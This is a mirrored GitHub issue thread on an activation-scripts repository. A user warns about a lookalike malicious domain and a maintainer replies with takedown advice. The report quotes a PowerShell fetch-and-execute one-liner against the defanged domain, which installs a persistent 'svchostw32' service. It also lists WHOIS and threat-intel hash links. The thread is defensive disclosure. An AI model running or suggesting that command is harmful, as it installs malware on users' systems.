starred/Microsoft-Activation-Scripts
1
0
Fork 0
mirror of https://github.com/massgravel/Microsoft-Activation-Scripts.git synced 2026-04-25 22:15:54 +03:00
Code Issues 2 Projects Releases 10 Packages Wiki Activity

[GH-ISSUE #1299] Attention! malicious domain actiwated[.]win. #888

New issue
Closed
opened 2026-02-27 10:13:15 +03:00 by kerem · 1 comment
kerem commented 2026-02-27 10:13:15 +03:00
Owner
Copy link

Originally created by @Dominator-3000 on GitHub (Feb 9, 2026).
Original GitHub issue: https://github.com/massgravel/Microsoft-Activation-Scripts/issues/1299

Hello!

I found the malicious domain actiwated[.]win.

When executed from PowerShell irm https://get.actiwated[.]win | iex, it creates the svchostw32 service and persists in the system!

Domain Information:

Domain Name: actiwated[.]win
Registry Domain ID: REDACTED FOR PRIVACY
Registrar WHOIS Server: whois.gathernames.com
Registrar URL: https://www.gname.com/
Updated Date: 2025-12-26T10:15:27Z
Creation Date: 2025-10-27T10:15:24Z Registry Expiry Date: 2026-10-27T10:15:24Z

More information:
https://www.virustotal.com/gui/file/80f959b0969f8680c9b5ecc55cef44d7c208435f10918fb7412fc95beabab06a/relations
https://opentip.kaspersky.com/80F959B0969F8680C9B5ECC55CEF44D7C208435F10918FB7412FC95BEABAB06A/static

Originally created by @Dominator-3000 on GitHub (Feb 9, 2026). Original GitHub issue: https://github.com/massgravel/Microsoft-Activation-Scripts/issues/1299 Hello! I found the malicious domain actiwated[.]win. When executed from PowerShell irm https://get.actiwated[.]win | iex, it creates the svchostw32 service and persists in the system! Domain Information: Domain Name: actiwated[.]win Registry Domain ID: REDACTED FOR PRIVACY Registrar WHOIS Server: whois.gathernames.com Registrar URL: https://www.gname.com/ Updated Date: 2025-12-26T10:15:27Z Creation Date: 2025-10-27T10:15:24Z Registry Expiry Date: 2026-10-27T10:15:24Z More information: https://www.virustotal.com/gui/file/80f959b0969f8680c9b5ecc55cef44d7c208435f10918fb7412fc95beabab06a/relations https://opentip.kaspersky.com/80F959B0969F8680C9B5ECC55CEF44D7C208435F10918FB7412FC95BEABAB06A/static
kerem closed this issue 2026-02-27 10:13:15 +03:00
kerem commented 2026-02-27 10:13:15 +03:00
Author
Owner
Copy link

@ave9858 commented on GitHub (Feb 10, 2026):

Hi, thanks for reporting. We recently started investigating this malware after someone shared a different URL that executes this same payload. All we can really do is ask the community to report all the URLs involved to the hosting providers and domain registrars. For example, the URL you reported is hosted on Cloudflare so you could report it to them, and also to GNAME to try and get the domain taken down.

<!-- gh-comment-id:3874531516 --> @ave9858 commented on GitHub (Feb 10, 2026): Hi, thanks for reporting. We recently started investigating this malware after someone shared a different URL that executes this same payload. All we can really do is ask the community to report all the URLs involved to the hosting providers and domain registrars. For example, the URL you reported is hosted on Cloudflare so you could report it to them, and also to GNAME to try and get the domain taken down.
Sign in to join this conversation.
No Branch/Tag specified
Branches Tags
master
dev
3.10
3.9
3.8
3.7
3.6
3.5
3.4
3.3
3.2
3.1
3.0
2.9
2.8
2.7
2.6
2.5
2.4
2.3
2.2
2.1
2.0
1.9
1.8
1.7
1.6
1.5
1.4
1.3
1.2
Labels
Clear labels   
pull-request

Mirrored from GitHub Pull Request

No labels
pull-request
Milestone
Clear milestone
No items
No milestone
Projects
Clear projects
No items
No project
Assignees
Clear assignees
No assignees
1 participant
Notifications
Due date
The due date is invalid or out of range. Please use the format "yyyy-mm-dd".

No due date set.

Dependencies

No dependencies set.

Reference
starred/Microsoft-Activation-Scripts#888
No description provided.